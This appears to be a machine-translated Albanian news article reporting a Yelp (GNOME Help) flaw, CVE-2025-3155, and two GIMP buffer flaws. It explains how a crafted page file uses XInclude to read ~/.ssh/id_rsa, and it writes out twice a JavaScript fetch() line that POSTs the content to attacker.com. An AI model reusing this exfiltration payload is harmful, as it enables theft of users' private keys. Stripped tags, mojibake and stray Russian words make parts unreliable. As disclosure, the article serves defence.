Dobitë në GNOME Help dhe GIMP që lejojnë ekzekutimin e kodit kur hapen skedarët

Në shikuesin Yelp, i cili përdoret si standard në GNOME për punë me manualet (GNOME Help), është zbuluar një dobësi (CVE-2025-3155) që lejon ekzekutimin e kodit JavaScript të rastësishëm kur hapen skedarë page të formatuar në mënyrë të veçantë. Ekzekutimi i skenareve të tillë mundëson dërgimin e skedarëve të përdoruesit në serverin e sulmuesit. Mund të ndiqni rregullimin e dobësisë në shpërndarjet e mëposhtme: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

NĂ« GNOME, pĂ«r tĂ« hapur skedarĂ« me manuale referimi, regjistrohet URI «ghelp://», i procesuar pĂ«rmes thirrjes nĂ« Yelp. PĂ«r njĂ« sulm, njĂ« agresor duhet tĂ« arrijĂ« tĂ« ngarkojĂ« skedarin e tij index.page nĂ« sistemin e pĂ«rdoruesit. PĂ«r shembull, ai mund tĂ« manipullojĂ« pĂ«r tĂ« ngarkuar skedarin pĂ«rmes shfletuesit duke klikuar nĂ« njĂ« lidhje nĂ« faqen e sulmuesit. Pasi skedari Ă«shtĂ« ngarkuar, sulmuesi mund tĂ« fillojĂ« hapjen e kĂ«tij dokumenti, duke redirigjuar nĂ« shfletues kalimin nga faqja e tij nĂ« URL «ghelp://» me rrugĂ«n drejt katalogut ku Ă«shtĂ« ngarkuar skedari. PĂ«r shembull, «ghelp:///proc/self/cwd/Downloads», ku rruga «/proc/self/cwd» Ă«shtĂ« e asociuar me katalogun e punĂ«s tĂ« procesit aktual (kur запусĐșĐ°Đ”Ń‚ŃŃ yelp, ky do tĂ« jetĂ« katalogu i shtĂ«pisĂ« sĂ« pĂ«rdoruesit).

Vulnerabiliteti buron nga përdorimi i formatit Mallard, i bazuar në XML, në skedarët page. Ky format lejon futjen e përmbajtjeve të skedareve të tjera në dokument, duke përdorur mekanizmin XInclude. Për të përfaqësuar skedarët page, programi Yelp i konverton ata nga XML në HTML përmes XSLT (yelp-xsl), pastaj i shfaq me motorin WebKitGtk. Ideja është të arrihet futja e JavaScript në skedarin HTML të rezultatit dhe përdorimi i këtij JavaScript për të dërguar në serveri përmbajtja e futur nëpërmjet XInclude.

Për futur JavaScript, është përdorur fakti që XSLT kopjon disa elemente në HTML pa analizuara, për shembull, transferon tërësisht elementin dhe të gjithë përmbajtjen e brendshme. Kështu, për të dërguar skedarin "~/.ssh/id_rsa", mjafton të futet në dokumentin page me direktivën "include": server Pas kësaj, të shtohet përmes elementit thirrja e JavaScript me kodin për dërgimin e një kërkese POST në serverin e jashtëm, duke përdorur funksionin fetch(): onload=_=>fetch("http://attacker.com/",{method:"POST",body:document.body.outerHTML,mode:"no-cors"})

Pas së cilës, shtoni një thirrje JavaScript përmes elementit për të dërguar një kërkesë POST në një server të jashtëm, duke përdorur funksionin fetch(): onload=_=>fetch("http://attacker.com/",{method:"POST",body:document.body.outerHTML,mode:"no-cors"})

Përveç kësaj, mund të theksohen dy vulnerabilitete (CVE-2025-2761, CVE-2025-2760) në editorin grafik GIMP, që çojnë në ekzekutimin e kodit nga sulmuesi kur përdoruesi hap imazhe të përgatitura posaçërisht në formatet XWD dhe FLI. Të dy vulnerabilitetet shkaktohen nga mungesa e kontrollit të duhur të madhësisë së të dhënave që kopjohen në bufer gjatë procesit të analizës së përmbajtjes së skedarëve. Vulnerabilitetet janë eliminuar në versionin GIMP 3.0.0.

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster